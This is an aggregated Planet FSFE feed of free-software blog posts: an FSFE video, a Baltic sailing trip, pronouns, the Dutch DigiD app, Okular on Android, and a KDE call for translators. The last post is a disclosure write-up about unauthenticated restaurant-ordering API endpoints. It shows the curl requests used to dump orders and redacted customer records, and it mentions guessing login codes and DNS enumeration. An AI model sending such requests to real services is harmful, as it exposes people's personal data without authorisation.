  1. This is how a very minimal Docker service in the FSFE infrastructure looks like. For Docker2Caddy, only the docker-compose.yml file with its labels is relevant. ↩︎

  2. If you’re interested in setting this up via Ansible, I can recommend the ansible-docker-rootless role which we integrated in our full-blown playbook for the container servers. ↩︎

Friday, 08 April 2022

Short history of the "What is Free Software (Open Source)?" video

In February 2020, I was giving a talk titled "The core values of software freedom" at FOSDEM's largest auditorium (video recording). It was great to talk to such a large audience and have all those great discussions afterwards. Briefly afterwards, in March 2020, I gave the same talk at FOSS Backstage (video recording), especially enjoying the Q&A afterwards. Unfortunately, then the pandemic hit Europe, and it was my last conference in person for that year. So the next months I heavily missed having in person discussions with people I know and with new people I could have met at conferences.

Nevertheless, I had great online discussions about the topic of the talk, which encouraged me to think about how we can condense the message of the talk further to reach more people with it -- maybe with a short video similar to our "Public Money? Public Code!" video. When one person, who already before sent me kudos for my FOSDEM talk, heard about it, he offered to make a larger donation to cover the costs for such a video.

Alexander Lehmann, who also created the FSFE's "Public Money? Public Code!" video, was available with his team to work on the implementation of the video. It was a great pleasure to work with them on the video and find a way how to condense a 30-minutes talk into a short video.

We published this short "The Core Values of Software Freedom" video during the FSFE's 20-year anniversary, which was also the introduction of the FSFE's self-hosted peertube instance.

Afterwards, we received some feedback that people like the video, but would prefer an even shorter one and suggested shortening the existing video and make a few adjustments. After many people in the FSFE core team agreed to this, we again worked with Alexander Lehmann on the adjustments.

This week we published it: a video explaining the essential four rights to use, study, share, and improve software. Rights that help to support other fundamental freedoms like freedom of speech, press, and privacy. And all of that in less than 3 minutes, so the video can easily be shared whenever you want to quickly explain the topic to others.

Please share the video with friends, colleagues, and the public on different channels, embed it on your website with the provided code snippets, let us know how you like it by commenting, and if you see it on platforms which you are using, by rating the video there.

By doing this, you increase the chance that the video will be seen and recommended to people who have never heard of software freedom before. Help them learn what Free Software is, in less than 3 minutes!

Thank you.

Thursday, 07 April 2022

Shakedown cruise on the Baltic Sea

Just in time for a new cruising season to start, the story of our 2021 Baltic shakedown cruise is now online.

In Swedish archipelago Sailing in the Baltic

This was a 666NM trip that we did on our new-to-us Amigo 40 cruising boat in August-September 2021. Apart from engine trouble in the beginning, this was a very enjoyable little adventure on the coasts of Sweden and Bornholm.

Trip route

The trip even earned us the first prize in the cruising log contest of our sailing club:

Fartenseglerpreise

Read the story now.

Thursday, 31 March 2022

What’s in a pronoun?

Today is Transgender Day of Visibility, and I am nonbinary Transgender.

I recently told people that I now prefer they/them, or any other gender neutral pronoun, such as spivak (e). But he/she is OK, depending on context too. Since I still go by my masculine name, most people use masculine pronouns.

In German there is no standardized neuter pronoun, I go by er/sie but strongly prefer er. By contrast Finnish has no binary gendered pronous, the only one is hän, a gender neutral pronoun. When I started learning Finnish I had difficulty translating that pronoun. The use of hän does not misgender anyone, wheather they are nonbinary or not. German has ternary grammitical gender, er (masculine), sie (feminine) and es (neuter).
The neuter pronoun is not commonly used to refer to a person, only tho things and persons in some cases.

Somtimes I am a women, sometimes a men, often both at the same time, so both pronouns are correct for me, so strictly speaking using one of those pronouns is not misgendering in my case. Still I prefer neutral pronous, as those do not misgender anyone.

I mostly present masculine, but I do have a feminine voice, so that I can pass as a woman on the phone. I consider my voice more androgynous or in the upper part of the male range, which overlaps with the lower female range. When I first passed as a women that way I was unware of being Transgender and told poeple my masculine name, they were confused, because they were expecing a person with a masculine name not to be a women. At that time, I began cosplaying female characters, wearing red lipstick and nail polish.

Later after more people I know came out as trans, or nonbinary, I knew that I was nonbinary too and began exploring the use of different names, using different pronouns for each name. I was a grammer geek long before, and once in Star Trek when Riker tried to avoid personal pronouns, I liked that.

Tobias Alexandra Platen (he/she/they) or short Alex (they/them only)

Wednesday, 16 March 2022

Dutch digital identity system crisis

Nederlandse versie

Dutch digital identity verification system DigiD has announced the phasing out SMS as second factor. That way they require citizens to install a smartphone app in order to use digital services from the government, municipalities, the health sector and others. These applications only work on iOS and Android phones, with reliance on third party services.

Plenty of members of our community choose not to use a device that is tied to vendor-specific services. There is a threat our community will practically be locked out of the digital infrastructure the government has set up for us to use. Official alternatives are to ask a friend with the app for help or go back to snail mail and physical meetings.

This is an urgent matter with a big impact, so if you share my concern, please make your voice heard to policymakers.

The commission Digital Affairs will meet on the 22nd of March to discuss the digital government which includes the topic of identity systems. I’ve written to members of this commission to call attention to this issue and share the views of our community.

In the summer of 2021 I received a letter from my municipality that it was time to renew my driving license. The letter mentioned two ways of getting a renewal: either physically visit city hall or use the experimental digital process that has been around since 2018. More information on this digital process can be found on the dedicated Dutch webpage.

 

The first time I heard of this experiment was a couple of years ago at my local photographer, who was one of the first photographers to take part in this trial. Certified photographers act as the main point of contact in the process by ensuring a good photograph and identifying the citizen making the request. My local photographer was excited to take part in this experiment to help ease the process for customers. I too was excited because this seemed like a well thought-out process that would reduce the number of contacts and visits to get a driving license renewal.

So now, a couple of years later it was time for my renewal and it was about to experience how far our digital governmental services have come. I started the process by going to rijbewijsaanvragen.rdw.nl and I was immediately redirected to an DigiD prompt. DigiD is the login solution the Dutch government develops and uses. More information is available on Wikipedia and on the official website. Years ago DigiD was just using a username and password for verification, a single factor. Then SMS authentication was added as a possible second factor of authentication for improved security. Later a dedicated app was created for using your smarthone as a second factor, relying on the security features of the operating system. More recently the ability called check-id was added to apps read the NFC chip of identity cards and use that as the basis for authentication. More information on the identity card login method is available on the website.

When trying to start the digital request, this time the DigiD prompt didn’t show the SMS authentication option I would normally use. I could choose between the DigiD app and the option to read the NFC chip from the identity card. I was was baffled and assumed I had perhaps made a mistake. Carefully tracking my steps I retried but again I was faced with the same prompt.

 

 

Doing some more research, I found out that SMS was not considered safe enough for this application, and so this project was set up to at least require an installed DigiD App as second factor, or the use of an NFC readout of your ID-card.

I actually didn’t want to install the DigiD Android app, despite having a Nokia 8.1 smartphone with Google One Android on it. My previous phone was a Fairphone 2 with Fairphone Open OS, the Google-free Android version by Fairphone. Having experienced the Google-free Android, I’ve become aware how much apps rely on Google libraries and service to function. It had taken me quite some experimentation to move my app usage over to app that did not rely on Google Services. As I was considering another Google-free Android phone as my next phone, I didn’t want to commit myself to using an app that relied on Google to function, which the DigiD App does. Also I was looking towards a Linux phone like the Pinephone with Mobian, which would move me even further away from the Android app ecosystem.

I looked on the DigiD website for suggestions for this situation. The official recommendation is to ask somebody else with the DigD app for help. I couldn’t believe what I was reading. My government was now the single strongest force pulling me in the vendor-tied smartphone ecosystem I resent. I had already read about SMS planned to be phased out (Dutch article by Tweakers.net) and how the government is fuelling the Google and Apple duopoly (Dutch article, Archive.is), but being faced with it in real life made it so much more real and urgent. Already in 2018 when I was using the Fairphone, I emailed the DigiD if the if the DigiD app could be provided outside of the Google Play store, but got an answer that that was not possible.

In contrast, the situation in Germany is quite the opposite. AusweisApp2 is the German identification app, which is available in F-Droid, Debian and many other Free Software repositories. All of this is made possible because the source code is provided under a Free Software license (EUPL v1.2). This allowed the community to make the application available on many different platforms. The AusweisApp2 uses the chip in the identity card or passport as the basis for identity. So the app merely has to facilitate in communications with online services. Compared to apps like DigiD that act as a digital identity directly, only having to relay information reduces the security requirements. And without the reliance on vendor-specific crypto libraries it is easier to open up the code for transparency and collaboration as the Germans have done.

I decided I would stand by my principle of not installing the app and try to see what I could achieve. Worst-case I had to go back to the physical process I had done the last time I got my driving license. So I reached out to the RDW team responsible for this digital process which was still called an experiment despite being a couple of years in use already. I explained my situation, mentioned that I was not willing to ask anybody for help because I didn’t want to be relying on others for my digital services, and I asked about alternatives. I got a formal reply repeating what I already read online: it was not possible without the app.

In the mean time there was also a desktop application available to read out the NFC chip of an identity card. This app is only available through the Windows 10 app store. With all my computers running Debian or Ubuntu, that was no option for me. Even besides the fact that I didn’t have an ID-card with a NFC-chip in it to actually identify with. So unless the government starts releasing the applications for different operating systems, I don’t see this as a solution for me either.

 

Not having a solution that I could use by myself without relying on Google, I resorted to the traditional physical process. I went to my local photographer to get my picture taken, the same one that had told me about the digital process a few years earlier. He asked my if I wanted to use the digital process after I mentioned my picture was for my driving license renewal. I replied I didn’t want to make use of that because I didn’t want to install the app. And so I got my pictures in analog format, rather than them being sent digitally to the correct agency. Later I went to city hall to hand over my photograph and sign the papers requesting the renewal. A couple of days I went back to city hall to pick up my new driving license, and that was that.

Compared to the digital process it took me one more trip to city hall to file the request and it took some more paperwork. For a single case this wasn’t so bad and it was something to overcome. But with SMS planned to be phased out in 2022 the impact would be much greater. Most online public services require a second factor of authentication now, and more and more services are becoming digital. Tax registration is one of the services that still allows authentication without a second factor of authentication, but for how long? Dealing with public services without the DigiD app will become increasingly difficult, and that is why we need a solution that meets the ‘vendor-neutral’ and ‘open’ principles that our government itself is calling for.

The Dutch DigiD app acts as the source of identity and thus relies on the frameworks by Apple and Android to guarantee a trustworthy identity. To ever achieve a Free Software app in the Netherlands we should not rely on the locked-down operating systems and libraries of vendors to provide security guarantees. Like in Germany, relying on an identification chip in hardware can provide the trust a government needs without introducing this reliance. Another solution might be the IRMA app which relies partly on online connectivity for its security. IRMA has an active community in the Netherlands consisting of public bodies like municipalities and several companies needing a secure and accessible means of authentication. Regardless of the technical solution we end up with, it is important that it is vendor-neutral, free software, based on open standards and open for community contributions like operating system support. In 2020 Waag together with other organizations has already pushed for these values in the #goedID campaign.

It worries me that our government so far seems inconsiderate for our stance. The information on the website seems to imply that if you don’t have a Google Android or Apple smartphone you lack digital skills and fall into the same category as the elderly. Our community is quite the contrary. Exactly because we are so skilled and knowledgeable we avoid corporate dependence where we can. We need to make our voices heard and let the government know that we expect them to step up their game. In the last couple of years our community has shown in the Netherlands the willingness and ability to cooperate. For example by contributing to open source applications like the Covid tracing and QR-code apps and by making them available on F-Droid. So let’s keep that spirit of collaboration and call out the government on the current crisis they created and demand a solution that meets our values.

Monday, 07 March 2022

Okular: Signature support now works on Android

This is a continuation of https://tsdgeos.blogspot.com/2022/02/okular-signature-verification-user.html

In that blog what was introduced was the new user interface to be able to see digital signatures in the mobile interface (i.e. the one that uses Kirigami instead of QWidgets).

You can use the Okular mobile interface anywhere you want, it's not really mobile-only, it's really mobile-optimized, so you can try it (though you'll have to build it manually since most distributions don't build it by default) on desktop Linux too.

Anyway, in that previous blog I talked about introducing the new user interface to be able to see digital signatures, and that worked out of the box in places that provide NSS like desktop Linux or Plasma Phone distributions (Aleix tried on the PinePhone and confirmed it works), but for Android it still did not work.

What was needed was something very similar to what we did for Windows https://tsdgeos.blogspot.com/2022/02/okular-signature-support-now-works-on.html but this time for Android.

I added a way for Craft to build NSS for Android and told it to not disable NSS when building poppler for Android that should have been all.

But things are never simple enough...

For Android we use a tool called androiddeployqt, it is a tool that gathers everything needed for your project and creates the APK file for it. Unfortunately it has a documented limitation with runtime plugins, it has no way to know they are needed so they are not packaged. NSS unfortunately has plugins, so after some "why is this crashing?" hours of scratching my head and debugging i realized the problem was the missing plugins were not being "installed".

The workaround to make androiddeployqt work for plugins is basically linking the plugins to your binary, this way the plugin is a clear dependency and gets packaged, but did I say things are never simple enough?

In KDE we have binary-factory continuous integration for Android and we also have gitlab continuous integration for Android, unfortunately they use different ways of building, the first uses Craft, the second does not. This means that in gitlab CI the NSS library is not available, so I can't link to it, but i need to link to it so that Craft on the binary-factory CI creates the APK files correctly.

To try to resolve that I came up with a patch that tried to differentiate if we were building inside Craft or the gitlab CI unfortunately while that worked on my local setup it did not work on the KDE servers, so at the end I resolved for a much more pedestrian way, there's an option to enable the extra libraries and Craft enables that option when building Okular

So after that, yes, it works as you can see in the screenshot below :)

Signature Properties User Interface

If you want you can download the Okular APK from https://binary-factory.kde.org/job/Okular_Nightly_android-arm64/ but beware there are still some limitations that don't make Okular usable day-to-day for Android, so we've created a Google Summer of Code potential project for that, maybe you're interested?

Sunday, 06 March 2022

Looking for Translators!

KDE produces amazing software, but sometimes not everyone can use it.

One of the reasons that can happen is because it's not translated to a language they understand.

For that we are calling for translators, specially for the languages listed below which had not had a single translation update in the last year [*].

Committing to help means that you will do some work every now and then, not just translate a few texts only.

We will help you learn the tools needed and hopefully if you know more people that can help you can grow a team :)

If you're interested please email me at aacid@kde.org

Afrikaans
Armenian
Assamese
Bengali
Bosnian
Breton
Chhattisgarhi
Crimean Tatar
Croatian
Esperanto
Farsi
Frisian
Galician
Georgian
Gujarati
Hausa
Hebrew
Irish Gaelic
Kabyle
Kannada
Kashubian
Kazakh
Khmer
Kinyarwanda
Kurdish
Low Saxon
Luxembourgish
Macedonian
Maithili
Malay
Maltese
Marathi
Nepali
Northern Sotho
Occitan
Oriya
Pashto
Scottish Gaelic
Sinhala
Tatar
Telugu
Thai
Tswana
Uyghur
Uzbek
Walloon
Welsh
Xhosa

[*] apologies if indeed there were translations and my script failed for some reason

Friday, 25 February 2022

I went out for dinner and I took some endpoint

Three weeks ago I went out to a pub for dinner. Due to covid restrictions there are no paper menus anymore and the waitress gave me a card to place my order.

The card she gave me had a QR code and a 5-digit number. I scanned the QR code and opened the website it pointed to. To login I used that 5-digit number. I placed my order. So far so good.

When suddenly a hamburger button caught my attention. I pressed it, but mostly I clicked on the first item in the menu because, judging by its text, it seemed “nice” to have a look at the order I had just placed:

Hamburger button

Order history

Uh?! 4751€?! Definitely not me! To my surprice that page listed many orders, not just mine, and they were also old. That’s interesting.

Once back home, I wanted to understand it more. I opened the website in my browser, but I failed to login because my 5-digit number “expired”, then I gave it a few tries by increasing it and it worked :-)

I took a look at the JavaScript files to find the one that makes the request to retrieve the orders:

$.ajax({
  type: "POST",
  url: '/include/ajax.php?f=getlist&t=orders',
  data: {
    src:[
      {
        name:"self_cart_id",
        value:app.table_id,
        compare:"equal"
      }
    ],
    orderby: "id DESC"
  }

Let’s do the same request, changing the value (app.table_id) parameter and see what happens:

curl 'https://$HOST/include/ajax.php?f=getlist&t=orders' -X POST --data-raw "src%5B0%5D%5Bname%5D=self_cart_id&src%5B0%5D%5Bvalue%5D=1&src%5B0%5D%5Bcompare%5D=equal&orderby=id+DESC"

I got fewer orders. Then I increase the table_id and I got even less orders. Mmm, I take a second look at the parameters and then I realize that’s a query statement! At this point I played a bit with the parameters until I removed the value parameter completly. Well, now I got 347752 orders and they are even paginated:

"success": 1,
"pag": "1",
"per_pag": 500,
"total_records": 347752,
"total_pages": 696,

Fortunately, there was no sensitive information. I got all the orders made in the last ~2 years from all the pubs scattered around italy (the pub is part of a franchising). There was some Deliveroo/UberEats/Glovo id, but nothing sensitive. Not yet.

Back to the JavaScript file, there were few interesting calls:

    url: '/include/ajax.php?f=get&t=customers&id='+app.customer_id,
    url: '/include/ajax.php?f=edit_customer&t=self_cart&id='+app.table_id,
    url: '/include/ajax.php?f=getlist&t=categories',
    url: '/include/ajax.php?f=getlist&t=products',
    url: '/include/ajax.php?f=get&t=products&id='+$(this).attr("data-id"),
    url: '/include/ajax.php?f=edit_product&t=self_cart&id='+app.table_id,

I tried with the most tempting, customers, and here we go:

curl 'https://$HOST/include/ajax.php?f=getlist&t=customers'

"success": 1,
"pag": 1,
"per_pag": 500,
"total_records": 11928,
"total_pages": 24,
"rows": [
    {
        "surname": "<REDACTED>",
        "name": "<REDACTED>",
        "email": "<REDACTED>",
        "mobile": "<REDACTED>",
        "addresses": [
            {
                "name": "<REDACTED>",
                "surname": "",
                "address": "<REDACTED>",
                "zipcode": "<REDACTED>",
                "city": "<REDACTED>",
                "province": "<REDACTED>",
                "coord": "44.6<REDACTED>, 10.6<REDACTED>",
                "doorphone": "<REDACTED>",
							}
        ]
        "barcode": "https:\/\/api.$ANOTHER_HOST\/include\/barcode.php?f=png&s=code-128&d=1",

That single request returned 500 out of 11928 results that include full names, phone numbers and addresses of real persons who placed their orders through one of those food delivery apps.

Back to the JavaScript file, the edit_product call is also very tempting (what if I change the price of a product, place my order, and then restore the original price?), but I had already eaten dinner and didn’t try it.

Finally, the $ANOTHER_HOST domain got my attention because it points to a different domain. I googled it and I then realized that this pub was using an e-commerce made by a company that claims on their website that they serve 570 restaurants in Italy. Which makes that 11928 way larger.

To confirm this, I first googled the footer text in the e-commerce and actually found ~100 other websites using it that are affected by the same issue. Then, I found others using DNS enumeration targeting the $ANOTHER_HOST domain.

I warned the company about the unauthenticated endpoints and the possible data leak affecting them and their customers. They politely replied that they don’t provide bug bounties and the endpoints have been patched.

Planet FSFE (en): RSS 2.0 | Atom | FOAF |

              Albrechts Blog  Alessandro's blog  Andrea Scarpino's blog  André Ockers on Free Software  Bela's Internship Blog  Bernhard's Blog  Bits from the Basement  Blog of Martin Husovec  Bobulate  Brian Gough’s Notes  Chris Woolfrey — FSFE UK Team Member  Ciarán’s free software notes  Colors of Noise - Entries tagged planetfsfe  Communicating freely  Daniel Martí's blog  David Boddie - Updates (Full Articles)  ENOWITTYNAME  English Planet – Dreierlei  English on Björn Schießle - I came for the code but stayed for the freedom  English – Alessandro at FSFE  English – Alina Mierlus – Building the Freedom  English – Being Fellow #952 of FSFE  English – Blog  English – FSFE supporters Vienna  English – Free Software for Privacy and Education  English – Free speech is better than free beer  English – Jelle Hermsen  English – Nicolas Jean's FSFE blog  English – Paul Boddie's Free Software-related blog  English – The Girl Who Wasn't There  English – Thinking out loud  English – Viktor's notes  English – With/in the FSFE  English – gollo's blog  English – mkesper's blog  English – nico.rikken’s blog  Escape to freedom  Evaggelos Balaskas - System Engineer  FSFE interviews its Fellows  FSFE – Frederik Gladhorn (fregl)  FSFE – Matej's blog  Fellowship News  Free Software & Digital Rights Noosphere  Free Software with a Female touch  Free Software –  Free Software – hesa's Weblog  Free as LIBRE  Free, Easy and Others  FreeSoftware – egnun's blog  From Out There  Giacomo Poderi  Green Eggs and Ham  Handhelds, Linux and Heroes  HennR’s FSFE blog  Henri Bergius  Inductive Bias  Karsten on Free Software  Losca  MHO  Mario Fux  Matthias Kirschner's Web log - fsfe  Max Mehl (English)  Michael Clemens  Myriam's blog  Mäh?  Nice blog  Nikos Roussos - opensource  Planet FSFE on irl.xyz  Posts - Carmen Bianca Bakker  Posts on Hannes Hauswedell's homepage  Pressreview  Rekado  Riccardo (ruphy) Iaconelli – blog  Saint’s Log  TSDgeos' blog  Tarin Gamberini  Technology – Intuitionistically Uncertain  The trunk  Thomas Løcke Being Incoherent  Thoughts of a sysadmin (Posts about planet-fsfe)  Told to blog - Entries tagged fsfe  Tonnerre Lombard  Vincent Lequertier's blog  Vitaly Repin. Software engineer's blog  Weblog  Weblog  Weblog  Weblog  Weblog  Weblog  a fellowship ahead  agger's Free Software blog  anna.morris's blog  ayers's blog  bb's blog  blog  en – Florian Snows Blog  en – PB's blog  en – rieper|blog  english – Davide Giunchi  english – Torsten's FSFE blog  foss – vanitasvitae's blog  free software blog  freedom bits  freesoftware – drdanzs blog  fsfe – Thib's Fellowship Blog  julia.e.klein’s blog  marc0s on Free Software  pichel’s blog  planet-en – /var/log/fsfe/flx  polina's blog  softmetz' anglophone Free Software blog  stargrave's blog  tobias_platen's blog  tolld's blog  wkossen’s blog  yahuxo’s blog